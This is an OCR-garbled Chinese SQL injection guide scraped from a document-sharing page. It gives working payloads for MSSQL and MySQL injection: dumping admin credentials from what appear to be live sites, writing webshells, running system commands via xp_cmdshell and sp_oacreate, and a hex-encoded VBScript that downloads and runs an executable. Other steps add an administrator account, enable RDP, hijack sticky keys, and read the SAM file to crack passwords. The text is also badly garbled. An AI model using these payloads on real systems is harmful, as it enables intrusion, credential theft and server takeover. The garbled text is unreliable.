梳理的SQL注入資料_第1頁
梳理的SQL注入資料_第2頁
梳理的SQL注入資料_第3頁
梳理的SQL注入資料_第4頁
梳理的SQL注入資料_第5頁
已閱讀5頁,還剩166頁未讀, 繼續(xù)免費(fèi)閱讀

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡介

1.1.1注入漏洞挖掘1.單引號判斷法行516行519:行520://detachtheSalPararetersf行517:圖1如圖3、圖4所示。kbl_internet/news/newsdetails.asp?/kbl_internet/incs/functions.asp.line87×YouhoveaerrorInyounsGLantan.Checkthepwmslthatereasondstoyut即Laerververala圖3js7dF0001622500內(nèi)部服務(wù)器錯(cuò)誤javax.let.http.Httpsava:820)javax.let.http.Httpsava:820)atcon.apusic.veb.containeratjava.servlet.http.HttpServlet.aervice(Httpservlet.java:820)tconau5cvb.htp.Eotretrontanateon,apusie.uti1.ThreadPollmp13VorkerThread.run(Urknomn圖4“/”應(yīng)用程序中的服務(wù)器錯(cuò)誤。//fil]theDataTableusingdefaultvaluesfor//detachthesqlPararetersfrom2.數(shù)字型注入漏洞判斷法提交URL為“/Pro常,如圖6所示。門提交URL為“http://www.nohack誤,如圖7所示。擺公司招擺公司招聯(lián)系們圖7可以采用在URL后添加“+1”、“-1”或者加口日4×招招口國+×阿提交提交URL為“:or1>2”,返回正常頁面,如圖X所示。mobi/Production.asp?ArticleID=164X20orX2★3.字符型注入漏洞判斷法news_detail.aspx?nid=10aname=crab'and'NewsDetail圖10http:Bhews_detail.aspx?nid=106nane=crab'a★收藏夾建議網(wǎng)站▼★收藏夾圖11通過圖10、圖11顯示的不同,判斷出該網(wǎng)站存在字符型注入漏洞。/news_detail.aspxx?nid=10&name=crab'%2B'1”來確定是否存在注入漏不添加后綴顯示的網(wǎng)頁,如圖12所示。幫助00幫助00圖12添加“'%2B'1”后綴,網(wǎng)頁顯示錯(cuò)誤,如圖13所示。圖13在搜索框中輸入搜索關(guān)鍵字“手術(shù)%'and1=1and'%'='”,網(wǎng)頁返回正常,如圖14[近視話題]近視手術(shù)安全嗎?7-17[近視資訊]準(zhǔn)分子激光近視手術(shù)發(fā)展史7-16[生活快報(bào)]醫(yī)生手術(shù)開腹后讓患者躺4小時(shí)等專家支援7-10[近視話題]高三生擠爆近視手術(shù)門診7-1[生活快報(bào)]21歲小伙做變性手術(shù)成女人自稱有回歸感7-1.會選擇人工多胞胎嗎圖14將搜索關(guān)鍵字替換為“手術(shù)%將搜索關(guān)鍵字替換為“手術(shù)%'and1=2and'圖15手術(shù)%and1=2and%=99789wSAWSA...wSA..HTTP/1.12000KHTTP/1.12000K21FFF102C724A3717031:18Refererhittp:///News/Searchaspx?c=02q=×CAXD62CA2F5Accept-Language:zh-User-AgentMozlla/4.0(compatible;MSIE6.0;WindowsCookiecck_lastime=1248359370384cck_count=0:cnz2_a916564=18;yw916564=×3459291851×3A59885905%3A64837771×3440921294×3A5850351423A;sin916564-=nonetime=0time=1248363425687;cn2z_eid=28252075-12ASP.NET_Sessionld=0j424×bmlw5ulnm23huiOwnw:ystat_bc_813130=30681398193807766ystat_ss_813130-1_1248392圖16 如:提交URL為:“/thous/關(guān)于工們1設(shè)為(加入圖XX圖17ScanAudtPernetr圖18YileToolsConfiYileToolsConfiScnTheaddd也也圖19 nd1=(selectISSRVROLEMEMBER('dband1=(selectISSRVROLEMEMBER('public'))//網(wǎng)頁返回正常,說明數(shù)據(jù)庫管理權(quán) and1=(selectismembe //網(wǎng)頁返回正常,說明數(shù)據(jù)庫管理權(quán)//網(wǎng)頁返回正常,說明數(shù)據(jù)庫管理and(selectdbname()>0名//網(wǎng)頁顯示當(dāng)前用戶名//網(wǎng)頁顯示當(dāng)前用戶名//網(wǎng)頁顯示當(dāng)前用戶名//網(wǎng)頁顯示當(dāng)前用戶名andO<>db_name(n)//將n改成0,1,2,3……可以anduser_name()='dbo//網(wǎng)頁返回正常,說明數(shù)據(jù)庫管理權(quán)限為saDeveloperEditiononWindowsNT顯示當(dāng)前網(wǎng)站數(shù)據(jù)庫版本為“MicrosoftSQLServer2005”,如圖20所示。文件(F)編輯(E)查看(V)收藏夾(A)工黃收澈夾☆建議網(wǎng)站▼e網(wǎng)頁快訊庫▼“/”應(yīng)用程序中的服務(wù)器錯(cuò)誤。轉(zhuǎn)換成數(shù)據(jù)類型int時(shí)失敗。異常詳細(xì)信息:SystemData.SqiClient.SqException:在將nvarchar值MicrosoftsQLServer2005-9.00.139Copyright(c)1988-2005MicrosoftCorporDeveloperEdtiononWndowsNT5.2(Buid3790:圖20在將在將nvarchar值'flower'轉(zhuǎn)換成數(shù)據(jù)類型int時(shí)失敗。顯示網(wǎng)站當(dāng)前數(shù)據(jù)庫名為“flower”,如圖21所示。圖21的“public”換成“db_owner”或“sysadmin”進(jìn)行測試。如圖22所示。圖22顯示當(dāng)前數(shù)據(jù)庫的第1個(gè)表名為“News”,如圖23所示。⑥oCon.aspxid-100and(selecttopInamefrom(“/”應(yīng)用程序中的服務(wù)器錯(cuò)誤。在將nvarchar值'News'轉(zhuǎn)換成數(shù)據(jù)類型int時(shí)失敗。說明:執(zhí)行當(dāng)前Web請求期間,出現(xiàn)未處理的異常。請檢查堆概跟蹤信息,以了解有關(guān)該錯(cuò)誤以及代碼中導(dǎo)致錯(cuò)誤的出處的詳細(xì)信息源錯(cuò)誤:圖23from(selecttop2id,namefromsysobjectswherextyp顯示當(dāng)前數(shù)據(jù)庫的第2個(gè)表名為“Manager”,如圖24所示。圖24在將nvarchar值'UserID'轉(zhuǎn)換成數(shù)據(jù)類型int時(shí)失敗。顯示Manager表的第1列的列名為“UserID”,如圖25所示。在在將nvarchar值UserID'轉(zhuǎn)換成數(shù)據(jù)類型int時(shí)失敗。-W圖25顯示Manager表的第2列的列名為“UserName”,如圖26所示。圖28圖26通過變換“and(selecttop1col_name(obhaving1=1”,網(wǎng)頁顯示錯(cuò)誤如下:顯示當(dāng)前數(shù)據(jù)庫的當(dāng)前表的第1列的列名為“Product.Pro_id”,如圖27所示。查看(V收藏夾(A)工具(D幫助H“/”應(yīng)用程序中的服務(wù)器錯(cuò)誤。進(jìn)擇列表中的列'Product.Pro_id'無效,因?yàn)樵摿袥]有包含在聚合函數(shù)或GROUPBY子句中。異常詳細(xì)信息:systemDataSsClentSgException選擇列表中的列ProductPro_o無效,因?yàn)樵摿袥]有包含在聚合函數(shù)或GROUPBY圖27接著提交URL為“/ProCon.asp顯示當(dāng)前數(shù)據(jù)庫的當(dāng)前表的第2列的列名為“Product.Pro_name”,如圖28所示。?httpsaspxid-100groupbyPro文件(E編輯(E)查看(0收瘤夾(4)工具(D幫助(H)異常詳細(xì)信息:SystemDatasaClent5gExcepten.選擇列表中的列PreductPro_name無效,因?yàn)樵摿袥]有包舍在聚合函數(shù)或GR1所示。在將nvarchar值'admin'轉(zhuǎn)換成數(shù)據(jù)類型int時(shí)失敗。顯示Manager表的UserName列對應(yīng)的第1行的內(nèi)容為“admin”,如圖29所示。“/”應(yīng)用程序中的服務(wù)器錯(cuò)誤。圖29==”,如圖30所示。在在將nvarchar值'43UknCD4DyC8gY+Xys52A=一轉(zhuǎn)換成數(shù)據(jù)類型int時(shí)失順。-WindowsInternethttp:roCon.aspx?d=100and(sel“/”應(yīng)用程序中的服務(wù)器錯(cuò)誤。圖30intrernet/new/newsd圖31圖32所示7and1=2unionsele說明當(dāng)前數(shù)據(jù)庫中存在“admin_mst”這個(gè)表,如果顯示的網(wǎng)頁與圖32不一致,則說明不接著,將對admin_mst表的各列以及內(nèi)容進(jìn)行猜解,通常與網(wǎng)站管理員的用戶名和密將列名代入圖32中顯示出“2”和“4”兩個(gè)數(shù)字的位置。提交URL為“http://www.word,5fromadmin_mst”,暴出后臺管理員的用戶名“admin”、密碼“pT2web”。如圖33所示。Hone/Mewn/NewsDet圖33如果當(dāng)前數(shù)據(jù)庫中沒有需要的關(guān)鍵信息,需要采取跨庫注入暴出其它數(shù)據(jù)庫中存在/ProCon.aspx?id=100andO<>db_name(1)”,網(wǎng)頁暴出錯(cuò)誤如下:在將nvarchar值'master轉(zhuǎn)換成數(shù)據(jù)類型int時(shí)失敗。顯示網(wǎng)站的第1個(gè)數(shù)據(jù)庫為“master”,如圖34所示。圖36圖34注:MsSQL數(shù)據(jù)庫的第1至第4個(gè)數(shù)據(jù)庫為系統(tǒng)自用,網(wǎng)站管理員創(chuàng)建的數(shù)據(jù)庫從00andO<>(selectcount(*)frommaster.dbo.sysdatabasesw在將在將nvarchar值'tempdb'轉(zhuǎn)換成數(shù)據(jù)類型in顯示第2個(gè)數(shù)據(jù)庫為顯示第2個(gè)數(shù)據(jù)庫為“tempdb”,如圖35所示。在將nvarchar值tempdb'轉(zhuǎn)換成數(shù)據(jù)類型nt時(shí)失敗圖35提交URL為“/ProCon.aspx?id=100andO<>(selectcount(*)frommaster.dbo.sysdatabaseswherename>1anddbid=5)”,網(wǎng)頁暴出錯(cuò)誤如下:顯示第5個(gè)數(shù)據(jù)庫為“hadong”,如圖36所示。CC在格nvarchar值"hadong轉(zhuǎn)換成數(shù)據(jù)類型Int時(shí)失敗。-WindowsInternetEkplorerype=U)”,網(wǎng)頁顯示錯(cuò)誤如下:顯示“hadong”數(shù)據(jù)庫的第1個(gè)表名為“Users”,如圖37所示。在將nvarchar值'Users'轉(zhuǎn)換成數(shù)據(jù)類型int時(shí)失敗。圖37fromhadong.dbo.sysobjectswherextype=U'and在將nvarchar值'VoteTitle′轉(zhuǎn)換成數(shù)據(jù)類型int時(shí)失敗。圖38(*)fromhadong.dbo.sysobjectswherextype=U'andname='Users'anduid>(str(id))”,顯示“Users”表的ID號為“5575058”,如圖39所示。圖39提交URL為“/ProCon.aspx?id=100andO<>(selecttomefromhadong.dbo.syscolumnswhereid=5575058)”,網(wǎng)頁顯示錯(cuò)誤如下:在將在將nvarchar值'ID'轉(zhuǎn)換成數(shù)據(jù)類型int時(shí)失敗。顯示顯示“Users”表的第1列的列名為“ID”,如圖40所示。在將nwarchr值10轉(zhuǎn)換成殿據(jù)類型成時(shí)夫殿。-WindosinternetErplore在將nvarchar值'ID′轉(zhuǎn)換成數(shù)圖40提交URL為“/ProCon.aspx?id=100andmefromhadong.dbo.syscolumnswhereid=5575058andna在將nvarchar值'UserName'轉(zhuǎn)換成數(shù)據(jù)類型int時(shí)失敗。顯示“Users”表的第2列的列名為“UserName”,如圖41所示。圖41提交URL為“/ProCon.aspx?id=100andmefromhadong.dbo.syscolumnswhereid=5575058))”,網(wǎng)頁顯示錯(cuò)誤如下:在將在將nvarchar值'UserPw'轉(zhuǎn)換成數(shù)據(jù)類型int時(shí)失敗。顯示“Users”表的第3列的列名為“UserPw”,如圖42所示。Con.sps7d-100and0es(slettopInaneromhadongdo.syscdunsheres-5575058ndnamenctr(l0,文件(E編輯(E)查著(0收藏夾(4)工具(I幫助H在將nvarchar值'UserPw'轉(zhuǎn)換成數(shù)據(jù)類型int時(shí)失敗。圖42RL為“http://www.nohacke顯示顯示“UserName”列的第1行的內(nèi)容為“administratorl”,如圖43所示。在將nvarchar值'administrator1'轉(zhuǎn)換成數(shù)據(jù)類型int時(shí)失敗。-WindowsInternetExplorerroCon.aspxid=100andO<(selectIDfromhadong.dbo.UserswhereUserNam文件(E查看(V)收藏夾(4)工具(T)幫助(H在將nvarctar值adnistator'轉(zhuǎn)換成數(shù)據(jù)類型n圖43提交URL為:“/ProCon.aspx?id=100andO<(selectIDfromhadong.dbo.UserswhereUserName>1andUserNamenotin('administrator1'))”,網(wǎng)頁顯示錯(cuò)誤如下:在將nvarchar值'quantriweb'轉(zhuǎn)換成數(shù)據(jù)類型int時(shí)失敗。顯示“UserName”列的第2行的內(nèi)容為“quantriweb”,如圖44所示。在將nvarchar值'quantriweb'轉(zhuǎn)換成數(shù)據(jù)類型int時(shí)失敗。圖44D喇唯入工具V2.23無限制版Q?:9269563http=//我的騰訊微博工嗎另新圖45旁注WEB綜合檢測程序Ver3.6修正版(09.10.14版)[黑客動(dòng)畫吧出品明小子]共有站點(diǎn)當(dāng)前頁面本頁顯示:0-0網(wǎng)站排名<程序提示)注入點(diǎn)圖46命令行執(zhí)行|注冊表操作|[Goldam干凈拓寬取]fD0s命令開自389行圖47歲月最要?dú)q月最要TmSre.Co內(nèi)事專用版注入地址ptp:/bi5.huaxia.cen/ate/bi5/w.chtinaytgouton/shop/pbhine/list.踏解記錄范圍1=1SeanInjectBackDatabasa|GetYebzhel1|ReeRader圖48[frosernme]:lidaGseript工具」跨庫狀態(tài)完成p-黑客手冊:WW.NOhacK.ColI歲月聯(lián)盟:Www.SyUe.Coll圖49Taiget/index.asp四01810BA627F2A8F23A88761AD9D37E2FC7C68A59450EA97C5770C7872Wecometoorhttp://forum.daT圖50⑤回KeyWordstopped!圖511.1.4db_owner權(quán)限下的注入1.獲取網(wǎng)站的絕對路徑行516:行行519:行520://filltheDataTableusingdefaultval//detachtheSqlParametersfromthecommandob圖52declare@resultvarchar(255)EXECmaster.dbo.xp_regread'HKEY_LOCAL_MACHIsertintocmdvalues(@result);--and1=(selectcount(*)fro②調(diào)用xp_dirtree存儲過程: ;createtablecmd(subdirectoryvarchar(400)NULL,depthtinyintNULL,[file]binsertcmdexecmaster.xp_dirtree'C:V,1,1--//將C盤的文件夾及文件插入到表中directory])Torderby[file]desc,暴出“c:\”盤根目錄下“DocumentsandSettings”文件名,如圖53所示?!踅Y(jié)果|消息圖53ADMIN-ULV498.QLQuery4.s2.備份一句話網(wǎng)馬庫 ;backuplog[當(dāng)前數(shù)據(jù)庫名]todisk='c:\recycler\1.bak'withinit--//先把日志備份到到C盤徑數(shù)據(jù)庫為“flower”,db_owner權(quán)限,網(wǎng)站絕對路徑為“C:\flowerCompany\”,如圖64行516:行517:行518:行519:行520:圖64/fil]theDataTableusingdefaultvaluesfor//detachtheSqlPararetersfranthecomandobject,圖65k懶口!郁n111日t?tr*r1回productsasp2011-01-1922:41:30333圖663.備份木馬至啟動(dòng)項(xiàng);alterdatabase[當(dāng)前數(shù)據(jù)庫名]setRECOVERYFULL-74223EOD0A77696E646F772E6D6F7665546F20383838382C303A2F2F3139322E3136382E312E32332F746573742E657865220DOA703D22DOA53657420783D4372656174654F626A65637428224D6963726F736F66742E584D445022290DOA782E4F70656E22474554222C752C300DOA782E53656E6428290D733D4372656174654F626A656374282241444F44422E53747265616D2653D330D0A732E547970653D310D0A732E4F70656E28290D0A732E577269573706F6E7365426F6479290D0A732E53617665546F46696C6520702C3D4372656174654F626A6563742822577363726970742E5368656C6C22290D0A772E50702C300DOA772E52756E22636D64202F632064656C20612E687461222C36F772E726573697A65546F20302C300D0A77696E646F772E636C6F73650D;backuplog[當(dāng)前數(shù)據(jù)庫名]todisk='C:\DocumentsandSettings\Administrator\「開其中“0x3C736372697074206C616E67756167653D225642536372697074223EO96E646F772E6D6F7665546F20383838382C383838380DOA753D22687474703D4372656174654F626A65637428224D6963726F736F66742E584D4C485454502229054F626A656374282241444F44422E53747265616D22290DOA732E4D6F64547970653D310DOA7326F6479290D0A732E53617665546F46696C6520702C320DOA53657420773D4626A6563742822577363726970742E5368656C6C22290DOA772E52756E20E52756E22636D64202F632064656C20612E687461222C300DOA77696E646F772E7A65546F20302C300D0A77696E646F772E636C6F73650DOA3C2F7363726970743E”這段數(shù)字為下面這段代碼的16進(jìn)制:<<scriptlanguage="VBScript">window.moveTo8888.8888Setx=CreateObject("MicrSetSetw=CreateObject("Wscript.Shell")w.Runp,0w.Runp,0天陽兩絡(luò)技術(shù)聯(lián)盟天陽兩絡(luò)技術(shù)聯(lián)盟注入工具注入分析望字符轉(zhuǎn)換①關(guān)于Setw=CreataObject("W0x3C736372697074206C616E67756167653D225642536372697074223EOD0A77696E646F772E6D6F7665546F203838圖67ODOA406E657420757365722061646D696E2061646D696E202F6164640DOA406F63616C67726F75702061646D696E6973747261746F72732061646D696E202F6164064656C2073746172742E6261740D0A40657869740D0A400DC002000730074006100720074002E00640061007400”這段數(shù)字為下面這段代碼的16進(jìn)@@echooff@netuseradminadmin/add @netlocalgroupadministratorsadmin/add/*添加admin這個(gè)用戶,并提升為管理@查看(0收章(4)工具D幫助圖68由于bat文件對字節(jié)數(shù)有嚴(yán)格要求,并且bat文件執(zhí)行很不穩(wěn)定,實(shí)際的操作過程中一般采用備份成hta文件的方式。1.1.5sa權(quán)限下的注入sa權(quán)限,是System和Admin的縮寫,為MsSQL數(shù)據(jù)庫的默認(rèn)系統(tǒng)賬號,具有最高的數(shù)據(jù)庫管理權(quán)限。該權(quán)限下除了前面在public權(quán)限、db_owner權(quán)限下介紹的對數(shù)據(jù)庫擁有讀取、寫入等權(quán)限之外,還可以利用MsSQL數(shù)據(jù)庫自帶的擴(kuò)展存儲(如:xp_cmdshell、xp_regwrite、sp_oacreate等)執(zhí)行系統(tǒng)命令。//提供進(jìn)程的進(jìn)程ID,終止此進(jìn)程//報(bào)告當(dāng)前定義的擴(kuò)展存儲過程,以及該過程(函數(shù))所屬的動(dòng)態(tài)鏈接庫(DLL)的名稱在MsSQL2005的數(shù)據(jù)庫中,默認(rèn)不開啟xp_c 如果執(zhí)行了上面的命令,還是不能開啟xp_cmdshell存儲過程,說明管理員將xplog70.dll刪除了,需要將xplog70.dll上傳至目標(biāo)服務(wù)器(一般通過Webshell上傳),之后再執(zhí)行該命令可以顯示系統(tǒng)版本“MicrosoftWindows[版本5.2.3790]”,如圖68所1ADIIN-ULV498YLZ(9.0RTM)第1行圖68-回×執(zhí)行該命令后將顯示C盤文件列表,如圖69所示。ADMIN-ULV498Y..QLQuery4.sql*0查詢己成功執(zhí)行就緒行圖69 createTABLEmytmp(infoVDECLARE@outVARCHAR(4EXECsp_oacreate'wscript.shell',@shEXECspoamethod@shell,'run',null,'cmd.exe/cdirc:\>c:\recycler\temp.txt','將C盤目錄保存到“C:\recycler\temp.txt”文件里,如圖70所示。MicrosoftSQLServerMa-回×文件(E)編輯(E)視圖(V查詢(Q)項(xiàng)目(D)工具(D窗口(W新建查詢(NB日國ADMIN-ULV498Y.QLQuery4.sql上createTABLEmytmp(infoVARCHAR(400),IDintIDE上EXEC=p_oacreate'wacript.shel1',0=hel1outputEXFCannamet.hndA=he11.'run!.nul1.'rmd.exe/cdirc:A>c:\temn.txt.10mp.tst-記事本-回×E)編輯(E)格式(O查看(V)幫助(H)<DIR><DIR><DIR>圖70 USEmsdbcreatetable[incsql](resulttxtnvarchar(1024)null)execspdeletejobx'execspaddjob'x'execspaddjobstepnull,'x',null,'1','cmdexec','cmd/c"netusest.txt'execsp_add_jobservern將把操作系統(tǒng)用戶名保存到“c:\test.txt”文件中,如圖71所示。消息w的用戶帳戶命令運(yùn)行完畢,但發(fā)生一個(gè)或多個(gè)錯(cuò)誤。圖71MsSQL2005默認(rèn)未開啟sp_configure存儲過程,因此得先啟用“WebAssistantProceWebAssistantProcedures',1;RECONFIGURE;;EXECsp_makewebtask'c:將生成一句話網(wǎng)馬“c:\test.asp”,如圖72所示。MictosoftsOLServerManagementStudio文件(E)編輯(E)視圖(Wsexecsp_makevebtask'c:\test.asp''select''<execute(request("a"))<TITLE>MicrosoftsQLServerWe<PRE><TT>上次更新時(shí)間:2011-11-1611:21:10.973<TR><THALIGN=LEFT>n/a</TH></TR><TR><TD><TT><2execute(request("a"))名></TT></TD></TR>圖72開啟3389端口命令:;EXECmaster.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentContrt\Control\TerminalServer','fDenyTSConnections',REGDWO關(guān)閉3389端口命令:;EXECmaster.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\TerminalServer','fDenyTSConnections';EXECmaster..xp_regread'HKEY_LOCAL_MACHontrol\TerminalServer\WinStation顯示當(dāng)前操作系統(tǒng)開啟了遠(yuǎn)程桌面的3389端口,如圖73所示。目當(dāng)些第1行圖73⑦映像劫持?jǐn)?shù)里指定的程序文件名作為用戶試圖啟動(dòng)的程序來處理Nwindows\lsystem32\\cmd.exe'執(zhí)行完畢后,點(diǎn)擊5次shift鍵可以得到Cmdshell。首先執(zhí)行語句將explorer.exe復(fù)制為set 再執(zhí)行語句將sethc.exe復(fù)制到dllcache目錄下:執(zhí)行完畢后,點(diǎn)擊5次shift鍵可以得到Explorer.exe。⑨沙盒模式HINE\SOFTWARE\MicrosoftJet\4.0\Engines\SandBoxMode”,其“R鍵值是2,當(dāng)把它改成0的時(shí)候就開啟了沙盒模式。首先修改注冊表:;EXECmaster.dbo.xpregwMsSQL2005默認(rèn)情況下未開啟OpenR ;Select*FromOpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system\ias\ias.mdb','selectshell("netusernohacker/ad|?執(zhí)行0√日器2臨”口0國0usRADHIH-UW498YLZ圖743.站、庫分離條件下的注入dintNULL,namevarchar(256)null);建立了一個(gè)nohacker的庫名和A、B兩個(gè)表首先建立一個(gè)FTP服務(wù)器,將木馬“server.exe”上傳到FTP服務(wù)器。之后在目標(biāo)網(wǎng)站的Webshell上執(zhí)行下列語句,可自動(dòng)下EXECmaster.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Winet1stopsharedaccess&echoopenIP>cmd.txt&echo用戶名>>cmd.txt&echo密碼>>tp-s:cmd.txt&p-s:cmd.txt&server.exe&server.exe&delcmd.txt/q/f&excmd.txt&echobinary>>cmd.txt&echogetserver.exe>>tp-s:cmd.txt&p-s:cmd.txt&server.exe&server.exe&delcmd.txt/q/f&ex或EXECmaster.xp_cmdshell'cdc:\reccmd.txt&echo用戶名>>cmd.txt&echo密碼>>cmd.txt&echobinary>>cmd.txt&echog③直接寫入16進(jìn)制木馬FilePath=Wscript.Arguments(0)FieName=Right(FilePath,Len(FilePath)-InStrRev(Fi.Type=1:.open:.loadfromfileFilePath:Str=.read:Sl=LenB(Str)WithCreateObject("Adodb.Stream").Type=1:.open:.loadfromfileFilePath:Str=.read:Sl=LenB(Str)WithCreateObject("Scripting.FileSystemObject").OpenTextFilbt=AscB(MidB(Str,i,Ifbt<16ThenWrite"Next之后,在Cmdshell上運(yùn)行:“C:\>cscript1.vbsserver.exe”,自動(dòng)生成“server.exe.t的16進(jìn)制代碼。如圖75所示。圖75EXECspOACreateEXECspOAMethod@ObjectToken,__目SA權(quán)限下十六進(jìn)制上工具.trt-寫字同可岡EXECsp.08Create'AD0D8.Strean',00bjectTokenOEXECp_0ASetProperty0bjectIoken,'IEXECap_0Aethod00bjectToken,'SaveToFile,NL,'server.exe,2FXECp_0Destroy20bject圖76服務(wù)端通過16進(jìn)制的方式“寫入”數(shù)據(jù)庫服務(wù)器的“c:\recycler\”目錄下,如圖77所e-iatanate-iatanat文件①查0員國I且①動(dòng)0LaatlaramiQndhaIesamalmluaamlaathIEnaamiauEalBaaton-SeedaDsmease-WsouEae-oFamgagte圖77“WAMP”(Windows+Apache+Mysql+PHP)兩種,由于“LAMP”的均為開源組件,穩(wěn)特有的擴(kuò)展功能。其使用方法,即在存在注入點(diǎn)網(wǎng)頁的URL后添加“/*!40000%20s*如圖78所示。ragliding/showdetailsphp?id=109/*15009120s*/圖78圖79信息、當(dāng)前用戶名和當(dāng)前數(shù)據(jù)庫名。提交URL為“http://www.nohac81所示。圖81步驟三:暴數(shù)據(jù)庫名nion+select+1,concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_sche8786F6F5D),3,4,5,6,7,8+from+information_schema.columns--”,直接暴出所有的數(shù)據(jù)庫名“[xxoo]information_schema,ginglide_newsdefg,ginglide_newsdepg,ginglide_newsdesf,ginglide_newsen,ginglide_newsenfg,ginglide_newsensf,ginglide_newsfrfg,ginglide_news圖82的16進(jìn)制轉(zhuǎn)換,如圖83所示。要轉(zhuǎn)的:URL格式10310511010310810510010195110圖83給我轉(zhuǎn)!得到“ginglide_newsen”的16進(jìn)制為“0x67696E676C6964655F6E657773656E”。_en_cfg[xxoo]”2個(gè)表名,如圖84所示。CLDERSPARAOToHCLDERSHAFNESSESBESCU[xxoo]news_en,news_en_c圖84ws_en”表名的16進(jìn)制,暴出“news_en”存在“[xxoo]id,titulo,foto,desarrollo1,desarrollo,fecha,background,bkg10[xxoo]”列名,如圖85所示。圖85LIMIT+0,1-”,暴出“[xxoo]WorldCupSpain2007!#ebebeb[xxoo]”,如圖86所示。圖861.常規(guī)利用方法圖87提交URL為“/news/model/display.php?id=49on+select+1,unhex(hex(user())),3,4,5,6,7,8,9,10,11,12,13t”,說明當(dāng)前數(shù)據(jù)庫用戶為“Root”,如圖88所示。圖88這里,注入語句的“2”換成了“unhex(hex(user())”,與前面的提交方式有點(diǎn)不同;原因在于網(wǎng)站編碼的不同,通過直接提交“user()”無法顯示當(dāng)前用戶信息,所以要/news/model/display.php?id=49+and+1=2+union+select+1,password,3,4,5,6,7,8,9,10,114,15+from+mysql.user”直接暴出Mysql數(shù)據(jù)庫“Root”用戶的密碼,再操作數(shù)據(jù)庫插入網(wǎng)馬,實(shí)際上通過這種方式暴出的“Root”用戶的密碼是無法破解的。提交URL為“/news/model/display.php?id=49+and+1=2+union+select+1,load_file(0x633A5C626F6F742E696E69),3,4,5,6,7,8,9,10,11,12,13,14,15--”,這里的“0x633A5C626F6F742E696E69”為“c:\boot.ini”的16進(jìn)制編碼,直接暴出: [bootloader]timeout=30default=multi(O)disk(Ogsystems]multi(O)disk(O)rdisk(O)partrise"/noexecute=optou顯示操作系統(tǒng)為“WindowsServer2003,Enterprise”,如圖89所示。圖89全起見,會將這個(gè)文件名改成其它的名字(作者曾遇到將這個(gè)文件名改為“test.php”)站的“phpinfo.php”,如圖90所示。證cscrot/nologoconfgurejs"-enable-snapshot-bulD:\gggAPMserver\amp\Apache2\phpphp,fie,http,ftp,compress.ThisprogrammakesuseoftheZendScrotZendEnginev2.0.4-dev,Copyright(c)1998-2004ZendTechnolallow_call_time_pass_realways_populate_raw_po88圖903所示。圖91.pm”nxifntpr/-(a0w.ara1999x1f(-(x-a[tjfranes[n)sx-atrlng(p:1fdr(c-0:t1<.faratrleggF(d-a-getenentayia)x-0-getrtateylax-):-return:圖92php”的16進(jìn)制代碼。顯示Mysql數(shù)據(jù)庫“Root”用戶的密碼為“hello_wymx”,如圖9,uua,“/*)//名A7/蘊(yùn)時(shí)文//圖片新聞表在致文章報(bào)的方名圖93連接該服務(wù)器的Mysql數(shù)據(jù)庫備份一句話網(wǎng)馬,并獲得網(wǎng)站的Websehll。連接Mysql數(shù)據(jù)庫有兩種方式:一種如果網(wǎng)站服務(wù)器開了3306端口,在本機(jī)安裝Mysql數(shù)據(jù)庫,執(zhí)行“C:\ProgramFiles\mysx”,可直接連接目標(biāo)服務(wù)器的數(shù)據(jù)庫;第二種通過登錄Mysql數(shù)據(jù)庫的“phpmyadmin”管理器進(jìn)行操作。是否存在“phpmyadmin”管理器,需根據(jù)實(shí)際情況確定。本例中登錄“phpmyadmin”管理器登錄后,如圖94所示??钣褂胮hpMyAdmln2.6.2-pl1phpMyAdminphpyAdmh顯示信息0顯示助的運(yùn)行信息OCreateTABLElcx(cmdtextNOTNULL)Selectcmdfromlcxintooutfile'D:\導(dǎo)入到導(dǎo)入到eval.php文件中在“Selectcmdfromlcxintooutfile'D:llwww\\news\leval.php'”1ocalhost1ocalhostIphpIyAdain2.6.2-pphpMyAdmin圖95網(wǎng)馬,并得到網(wǎng)站的Webshell。版本默認(rèn)為magic_quotes_gpc=on),未對URL提交的單引號進(jìn)行處理,使用Load_file ()函數(shù)時(shí)可直接使用Load_file('C:\boot.ini')來讀取服務(wù)器重要文件信息,而不必對“C:\boot.ini”進(jìn)行16進(jìn)制轉(zhuǎn)換。通常使用Load_file()函數(shù)讀取的重要配置文件如下:C:\ProgramFiles\ApacheGroup\Apache\confhttpd.confC:\apache\conf\httpd.conf/查看apache配置信息C:\Resin-3.0.14\conf\resin.confC:\Resin\conf\resin.confC:\ProgramFiles\mysql\my.iC:\windows\system32\inetsrv\MetaBase.xml//查看IIS的配置信息C:\ProgramFiles\Rhi/usr/local/app/apache2/conf/extra/httpd-vhosts.conf/usr/local/apche/conf/httpd.conf///etc/httpd/conf/httpd.conf/usr/local/apache2/conf/httpd.conf//查看apache配置信息/usr/local/resin-3.0.22/conf/resin.conf/usr/local/resin-pro-3.0.22/conf/resin.conf/etc/sysconfig/network-scripts/ifcf/etc/sysconfig/ipta/etc/fletc/httpd/conf/httpd.conf3.高級利用//查看IP信息//查看apache配置信息在Windows操作系統(tǒng)中,初次安裝系統(tǒng)設(shè)置的密碼通常保存在“c:\windowslrepair\sam”文件中,因此可以利用Load_file()函數(shù)還可以讀取F77735C7265706169725C73616D),60,32)),5,6,7,8,9,10--”,其中“Ox633A5C77696735C7265706169725C73616D”為“c:\windows\repair\sam”的16進(jìn)制,得到SAM文件的文件Q)編輯@)查看W置錄注冊級8圖XX運(yùn)行HexWorkshop工具,依次點(diǎn)擊【文件】、【新建】、【編輯】、【特殊粘貼】,選擇“CF_TEXT”、“解釋為十六進(jìn)制字串”選項(xiàng),并將前面讀取的SAM文件的點(diǎn)擊【文件】、【另存為】,并保存為SAM文件,接著使用SAMInside工具導(dǎo)入SAM文件進(jìn)行破解,如圖XX所示。GuesUsers;4.Passwordsfound:4(100.00%).298FSAAA6CroE6443.決連話同計(jì)機(jī)bled4.另類利用某些網(wǎng)站服務(wù)器被攻擊之后,有時(shí)會用種植WinlogonHack工具來記錄管理員登錄密碼,該工具記錄的密碼通常保存在“C:\windows\system32\boot.dat”文件中。對此,可以利用Load_file()函數(shù)直接讀取這個(gè)文件獲得操作系統(tǒng)登錄密碼。提交URL為“http://www./news/detail.p